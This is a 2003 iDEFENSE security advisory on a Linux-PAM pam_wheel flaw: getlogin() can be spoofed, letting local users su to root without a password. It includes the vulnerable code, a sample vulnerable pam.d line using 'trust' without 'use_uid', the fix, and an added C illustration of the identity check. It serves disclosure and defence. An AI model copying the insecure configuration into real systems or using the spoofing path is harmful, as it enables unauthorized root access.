iDEFENSE Security Advisory 06.16.03:
http://www.idefense.com/advisory/06.16.03.txt
Linux-PAM getlogin() Spoofing Vulnerability
June 16, 2003
I. BACKGROUND
The Pluggable Authentication Module (PAM) is a flexible mechanism for
authenticating users. More information is available at
http://www.kernel.org/pub/linux/libs/pam/ .
II. DESCRIPTION
The pam_wheel module of Andrew G. Morgan's Linux-PAM uses getlogin() in
an insecure manner, allowing attackers to bypass certain restrictions.
The pam_wheel module is often used with su(1) to allow users belonging
to a trusted group to use the command without supplying a password. The
module uses the getlogin() function to determine the name of the
currently logged-in user, and that name is then compared against the
list of members of the trusted group specified in the configuration
file. getlogin() does not consult the real UID of the calling process:
it takes the name of the terminal attached to standard input, which the
process itself chooses, and reports the user that utmp records for that
line, so the name it returns is not an authenticated identity. The
following is a snippet of the offending section of code:
fromsu = getlogin();            /* login name from utmp, not from the real UID */
if (fromsu) {
    tpwd = getpwnam(fromsu);
}

...
...
...

/*
 * test if the user is a member of the group, or if the
 * user has the "wheel" (sic) group as its primary group.
 */
if (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) {
    if (ctrl & PAM_DENY_ARG) {
        retval = PAM_PERM_DENIED;
    } else if (ctrl & PAM_TRUST_ARG) {
        retval = PAM_SUCCESS;   /* this can be a sufficient check */
    } else {
        retval = PAM_IGNORE;
    }
} else {
If the "trust" option is enabled in the pam_wheel configuration file
and the "use_uid" option is disabled, any local user may spoof the
username returned by getlogin() and gain access to a super-user account
without supplying a password. The following is a sample exploitation
scenario:
$ w
10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 7:13am 3:03m 0.30s 0.22s -bash
farmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? -
III. ANALYSIS
If the appropriate configuration options are enabled, and a member of
the wheel group is currently logged in, any local user can spoof log
entries or, in the worst case, obtain super-user privileges, depending
on the PAM configuration settings.
IV. DETECTION
Linux-PAM 0.77 and previous versions are vulnerable; however, the
configuration necessary for exploitability must also exist. More
specifically, an application such as su(1) must be configured to trust
the wheel group, and the use_uid option must not be enabled. This is
usually not the default on most Linux installations.
The following is a sample default nonvulnerable entry from
/etc/pam.d/su in Red Hat 7.3:
# Uncomment the following line to implicitly trust users in the "wheel" group.
#auth sufficient /lib/security/pam_wheel.so trust use_uid
The following is a sample entry in /etc/pam.d/su that would be
vulnerable to the described attack:
# Uncomment the following line to implicitly trust users in the "wheel" group.
auth sufficient /lib/security/pam_wheel.so trust
V. WORKAROUND
When utilizing the pam_wheel module, enable the use_uid option. With
use_uid the module resolves the caller from the real UID of the process
(getpwuid(getuid())) instead of from getlogin(), so the identity the
kernel enforces is what gets checked against the group. Doing so should
prevent the login name spoofing from circumventing PAM restrictions.
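As an added illustration (not code from the advisory or from Linux-PAM), the following stand-alone C program contrasts the two ways pam_wheel can identify the caller (getlogin() versus the real UID behind use_uid) and reproduces the decision logic of the snippet above, including the non-member branch the page cuts off; the option bit values, the sample group and that branch are this example's own assumptions.

```c
#define _POSIX_C_SOURCE 200809L /* getlogin()/getuid() under strict C modes */
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Local stand-ins for the return codes in the advisory's snippet (values as
 * in Linux-PAM's _pam_types.h); nothing here links against libpam. */
#define PAM_SUCCESS     0
#define PAM_PERM_DENIED 6
#define PAM_IGNORE      25

/* Module options as pam_wheel reads them off the pam.d line; the bit values
 * are this example's own choice. */
#define PAM_USE_UID_ARG 0x01
#define PAM_TRUST_ARG   0x02
#define PAM_DENY_ARG    0x04

/* Same contract as pam_wheel's is_on_list(): linear scan of a NULL-terminated
 * member list such as struct group's gr_mem. */
int is_on_list(char *const *list, const char *member)
{
    for (; list && *list; list++)
        if (strcmp(*list, member) == 0)
            return 1;
    return 0;
}

/* Identify the calling user. Without use_uid the module asks getlogin(), which
 * glibc answers from the terminal on stdin and the utmp record for that line;
 * a process picks its own stdin, so that name is not an authenticated identity.
 * With use_uid the kernel's real UID is mapped to a name instead. */
const char *resolve_caller(int ctrl, char *buf, size_t buflen)
{
    const char *name;
    if (ctrl & PAM_USE_UID_ARG) {
        struct passwd *pw = getpwuid(getuid());
        name = pw ? pw->pw_name : NULL;
    } else {
        name = getlogin();  /* may be NULL, may name somebody else */
    }
    if (!name)
        return NULL;
    snprintf(buf, buflen, "%s", name);
    return buf;
}

/* Decision logic of the advisory's snippet. The page cuts off after its
 * trailing "} else {"; the non-member branch below is this example's reading
 * of it. A caller that cannot be named at all fails closed. */
int wheel_decision(const char *fromsu, gid_t caller_gid,
                   const struct group *grp, int ctrl)
{
    if (!fromsu || !grp)
        return PAM_PERM_DENIED;
    if (is_on_list(grp->gr_mem, fromsu) || caller_gid == grp->gr_gid) {
        if (ctrl & PAM_DENY_ARG)
            return PAM_PERM_DENIED;
        if (ctrl & PAM_TRUST_ARG)
            return PAM_SUCCESS;  /* "sufficient" in pam.d: no password asked */
        return PAM_IGNORE;
    }
    return (ctrl & PAM_DENY_ARG) ? PAM_IGNORE : PAM_PERM_DENIED;
}

/* Constructed sample of the trusted group; not read from /etc/group. */
const struct group *sample_wheel_group(void)
{
    static char *members[] = { "root", "alice", NULL };
    static struct group wheel = {
        .gr_name = "wheel", .gr_passwd = "x", .gr_gid = 10, .gr_mem = members
    };
    return &wheel;
}

int main(void)
{
    char buf[256];
    const struct group *wheel = sample_wheel_group();
    const char *who;
    /* The name a misattributed getlogin() hands over versus the real caller. */
    printf("trust, fromsu=\"root\":   %d (0 = PAM_SUCCESS, no password)\n",
           wheel_decision("root", 0, wheel, PAM_TRUST_ARG));
    printf("trust, fromsu=\"farmer\": %d (6 = PAM_PERM_DENIED)\n",
           wheel_decision("farmer", 100, wheel, PAM_TRUST_ARG));
    who = resolve_caller(PAM_USE_UID_ARG, buf, sizeof buf);
    printf("use_uid caller:    %s\n", who ? who : "(uid has no passwd entry)");
    who = resolve_caller(0, buf, sizeof buf);
    printf("getlogin() caller: %s\n", who ? who : "(NULL: no utmp entry)");
    return 0;
}
```

Run it from a session with no utmp entry (a container, or a shell started with stdin redirected from a file) and the getlogin() path reports NULL while the use_uid path still names the real user.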
VI. VENDOR FIX
Andrew Morgan does not plan to release a new version of Linux-PAM;
however, Linux-PAM 0.78, which does fix this flaw, is obtainable via
the following CVS:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/pam/Linux-PAM/
Linux distributors will be releasing their own updates as appropriate.
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2003-0388 to this issue.
VIII. DISCLOSURE TIMELINE
21 OCT 2002 Issue disclosed to iDEFENSE
22 NOV 2002 Andrew Morgan (Linux-PAM maintainer) notified
23 NOV 2002 Response received from Andrew Morgan
25 NOV 2002 iDEFENSE clients notified
14 DEC 2002 Patch provided to iDEFENSE for validation
14 JAN 2003 Issue fixed in CVS
09 JUN 2003 Andrew Morgan contacted re: availability of next stable release
09 JUN 2003 vendor-sec@lst.de informed of CVS updates
16 JUN 2003 Coordinated public disclosure
X. CREDIT
Karol Wiesek (appelast@bsquad.sm.pl) is credited with discovering this
vulnerability.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world - from technical vulnerabilities
and hacker profiling to the global spread of viruses and other
malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence and
decision support on cyber-related threats. For more information, visit
http://www.idefense.com .
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html